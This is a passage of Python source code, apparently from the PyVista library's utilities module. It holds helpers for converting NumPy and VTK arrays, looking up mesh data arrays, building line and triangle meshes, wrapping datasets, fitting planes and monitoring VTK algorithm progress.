VTK ID list.
Returns
-------
numpy.ndarray
Array of IDs.
"""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Parameters
----------
arr : numpy.ndarray
Numpy string array to convert.
name : str, optional
Name to set the vtkStringArray to.
Returns
-------
vtkStringArray
VTK string array.
Notes
-----
Note that this is terribly inefficient. If you have ideas on how
to make this faster, please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=False, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
----------
arr : np.ndarray or vtkDataArray
A numpy array or vtkDataArry to convert.
name : str, optional
The name of the data array for VTK.
deep : bool, optional
If input is numpy array then deep copy values.
array_type : int, optional
VTK array type ID as specified in specified in ``vtkType.h``.
Returns
-------
vtkDataArray, numpy.ndarray, or DataFrame
The converted array. If input is a :class:`numpy.ndarray` then
returns ``vtkDataArray`` or is input is ``vtkDataArray`` then
returns NumPy ``ndarray``.
"""
if arr is None:
return
if isinstance(arr, (list, tuple)):
arr = np.array(arr)
if isinstance(arr, np.ndarray):
if arr.dtype == np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return ``True`` if the object is a PyVista wrapped dataset.
Parameters
----------
obj : anything
Any object to test.
Returns
-------
bool
``True`` when the object is a :class:`pyvista.DataSet`.
"""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def _assoc_array(obj, name, association='point'):
"""Return a point, cell, or field array from a pyvista.DataSet or VTK object.
If the array or index doesn't exist, return nothing. This matches VTK's
behavior when using ``GetAbstractArray`` with an invalid key or index.
"""
vtk_attr = f'Get{association.title()}Data'
python_attr = f'{association.lower()}_data'
if isinstance(obj, pyvista.DataSet):
try:
return getattr(obj, python_attr).get_array(name)
except KeyError: # pragma: no cover
return None
abstract_array = getattr(obj, vtk_attr)().GetAbstractArray(name)
if abstract_array is not None:
return pyvista.pyvista_ndarray(abstract_array)
return None
def point_array(obj, name):
"""Return point array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'point')
def field_array(obj, name):
"""Return field data of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'field')
def cell_array(obj, name):
"""Return cell array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str or int
Name or index of the array.
Returns
-------
pyvista.pyvista_ndarray or None
Wrapped array if the index or name is valid. Otherwise, ``None``.
"""
return _assoc_array(obj, name, 'cell')
def row_array(obj, name):
"""Return row array of a vtk object.
Parameters
----------
obj : vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return a field association object for a given field type string.
Parameters
----------
field : str, FieldAssociation
Name of the field (e.g, ``'cell'``, ``'field'``, ``'point'``,
``'row'``).
Returns
-------
pyvista.FieldAssociation
Field association.
"""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise TypeError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', err=False) -> Optional[np.ndarray]:
"""Search point, cell and field data for an array.
Parameters
----------
mesh : pyvista.DataSet
Dataset to get the array from.
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Whether to throw an error if array is not present.
Returns
-------
pyvista.pyvista_ndarray or ``None``
Requested array. Return ``None`` if there is no array
matching the ``name`` and ``err=False``.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if sum([array is not None for array in (parr, carr, farr)]) > 1:
if preference == FieldAssociation.CELL:
return carr
elif preference == FieldAssociation.POINT:
return parr
elif preference == FieldAssociation.NONE:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
if parr is not None:
return parr
elif carr is not None:
return carr
elif farr is not None:
return farr
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return None
def get_array_association(mesh, name, preference='cell', err=False) -> FieldAssociation:
"""Return the array association.
Parameters
----------
mesh : Dataset
Dataset to get the array association from.
name : str
The name of the array.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Boolean to control whether to throw an error if array is not
present.
Returns
-------
pyvista.FieldAssociation
Association of the array. If array is not present and ``err`` is
``False``, ``FieldAssociation.NONE`` is returned.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.ROW
# with multiple arrays, return the array preference if possible
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
arrays = [parr, carr, farr]
preferences = [FieldAssociation.POINT, FieldAssociation.CELL, FieldAssociation.NONE]
preference = parse_field_choice(preference)
if preference not in preferences:
raise ValueError(f'Data field ({preference}) not supported.')
matches = [pref for pref, array in zip(preferences, arrays) if array is not None]
# optionally raise if no match
if not matches:
if err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.NONE
# use preference if it applies
if preference in matches:
return preference
# otherwise return first in order of point -> cell -> field
return matches[0]
def vtk_points(points, deep=True, force_float=False):
"""Convert numpy array or array-like to a ``vtkPoints`` object.
Parameters
----------
points : numpy.ndarray or sequence
Points to convert. Should be 1 or 2 dimensional. Accepts a
single point or several points.
deep : bool, optional
Perform a deep copy of the array. Only applicable if
``points`` is a :class:`numpy.ndarray`.
force_float : bool, optional
Casts the datatype to ``float32`` if points datatype is
non-float. Set this to ``False`` to allow non-float types,
though this may lead to truncation of intermediate floats
when transforming datasets.
Returns
-------
vtk.vtkPoints
The vtkPoints object.
Examples
--------
>>> import pyvista
>>> import numpy as np
>>> points = np.random.random((10, 3))
>>> vpoints = pyvista.vtk_points(points)
>>> vpoints # doctest:+SKIP
(vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40
"""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
if force_float:
if not np.issubdtype(points.dtype, np.floating):
warnings.warn(
'Points is not a float type. This can cause issues when '
'transforming or applying filters. Casting to '
'``np.float32``. Disable this by passing '
'``force_float=False``.'
)
points = points.astype(np.float32)
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError(f'Dimension of ``points`` should be 1 or 2, not {points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError(
'Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)'
)
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : numpy.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[
(
2 * np.ones(n_lines, np.int_),
np.arange(0, n_points - 1, step=2),
np.arange(1, n_points + 1, step=2),
)
]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected
segments. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])``.
close : bool, optional
If ``True``, close the line segments into a loop.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> poly = pyvista.lines_from_points(points)
>>> poly.plot(line_width=5)
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points) - 1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points) - 1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points) - 1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape ``(N, 3)`` storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True, line_width=5)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a pyvista.PolyData object composed of vectors.
Parameters
----------
orig : numpy.ndarray
Array of vector origins.
vec : numpy.ndarray
Array of vectors.
Returns
-------
pyvista.PolyData
Mesh containing the ``orig`` points along with the
``'vectors'`` and ``'mag'`` point arrays representing the
vectors and magnitude of the the vectors at each point.
Examples
--------
Create basic vector field. This is a point cloud where each point
has a vector and magnitude attached to it.
>>> import pyvista
>>> import numpy as np
>>> x, y = np.meshgrid(np.linspace(-5,5,10),np.linspace(-5,5,10))
>>> points = np.vstack((x.ravel(), y.ravel(), np.zeros(x.size))).T
>>> u = x/np.sqrt(x**2 + y**2)
>>> v = y/np.sqrt(x**2 + y**2)
>>> vectors = np.vstack((u.ravel()**3, v.ravel()**3, np.zeros(u.size))).T
>>> pdata = pyvista.vector_poly_data(points, vectors)
>>> pdata.point_data.keys()
['vectors', 'mag']
Convert these to arrows and plot it.
>>> pdata.glyph(orient='vectors', scale='mag').plot()
"""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1) ** 0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to an array.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
Returns
-------
numpy.ndarray
Numpy array containing the data from ``matrix``.
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError(
'Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.'
)
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
Returns
-------
vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
VTK matrix.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(obj):
"""Test if passed object is instance of ``meshio.Mesh``.
Parameters
----------
obj
Any object.
Returns
-------
bool
``True`` if ``obj`` is an ``meshio.Mesh``.
"""
try:
import meshio
return isinstance(obj, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio.Mesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
pyvista.DataSet
The PyVista wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dims=dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
raise NotImplementedError('NumPy array could not be wrapped pyvista.')
# wrap VTK arrays as pyvista_ndarray
if isinstance(dataset, _vtk.vtkDataArray):
return pyvista.pyvista_ndarray(dataset)
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return pyvista._wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
# otherwise, flag tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.
Parameters
----------
image : pyvista.UniformGrid or vtkImageData
Image to convert.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture.
Parameters
----------
image : numpy.ndarray
Numpy image array.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
Parameters
----------
point : sequence
Three item cartesian point (i.e. ``[x, y, z]``).
bounds : sequence
Six item bounds in the form of ``(xMin, xMax, yMin, yMax, zMin, zMax)``.
Returns
-------
bool
``True`` when ``point`` is inside ``bounds``.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(
point, collections.deque
):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points using the SVD algorithm.
Parameters
----------
points : sequence
Size ``[N x 3]`` sequence of points to fit a plane through.
return_meta : bool, optional
If ``True``, also returns the center and normal used to
generate the plane.
Returns
-------
pyvista.PolyData
Plane mesh.
numpy.ndarray
Plane center if ``return_meta=True``.
numpy.ndarray
Plane normal if ``return_meta=True``.
Examples
--------
Fit a plane to a random point cloud.
>>> import pyvista
>>> import numpy as np
>>> cloud = np.random.random((10, 3))
>>> cloud[:, 2] *= 0.1
>>> plane, center, normal = pyvista.fit_plane_to_points(cloud, return_meta=True)
Plot the fitted plane.
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(plane, color='tan', style='wireframe', line_width=4)
>>> _ = pl.add_points(cloud, render_points_as_spheres=True,
... color='r', point_size=30)
>>> pl.show()
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, dataset):
"""Raise exception about inconsistencies.
Parameters
----------
scalars : numpy.ndarray
Array of scalars.
dataset : pyvista.DataSet
Dataset to check against.
Raises
------
ValueError
Raises a ValueError if the size of scalars does not the dataset.
"""
if isinstance(dataset, _vtk.vtkTable):
raise ValueError(
f'Number of scalars ({scalars.size}) must match number of rows ({dataset.n_rows}).'
)
raise ValueError(
f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({dataset.n_points}) '
f'or the number of cells ({dataset.n_cells}).'
)
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane.
Parameters
----------
normal : sequence
Three item sequence representing the normal of the plane.
origin : sequence
Three item sequence representing the origin of the plane.
Returns
-------
vtk.vtkPlane
VTK plane.
"""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement.
Parameters
----------
func : callable
Callable object.
*args
Any arguments.
"""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = 'Encountered issue in callback (most recent call last):\n' + ''.join(
traceback.format_list(stack) + traceback.format_exception_only(etype, exc)
).rstrip('\n')
logging.warning(formatted_exception)
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
Parameters
----------
number_of_peels : int, optional
Maximum number of depth peels.
occlusion_ratio : float, optional
Occlusion ratio.
Returns
-------
bool
``True`` when system supports depth peeling with the specified
settings.
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread.
Parameters
----------
fn : callable
Callable object.
Returns
-------
function
Wrapped function.
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods.
Parameters
----------
dec
Decorator
condition
Condition to match.
"""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor:
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
Parameters
----------
algorithm
VTK algorithm or filter.
message : str, optional
Message to display in the progress bar.
scaling : float, optional
Unused keyword argument.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm # noqa
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(
total=1, leave=True, bar_format='{l_bar}{bar}[{elapsed}<{remaining}]'
)
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points by angle about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``.
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If ``True``, the angle is interpreted as degrees instead of
radians. Default is ``True``.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {'x': (1, 0, 0), 'y': (0, 1, 0), 'z': (0, 0, 1)}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images from a directory.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
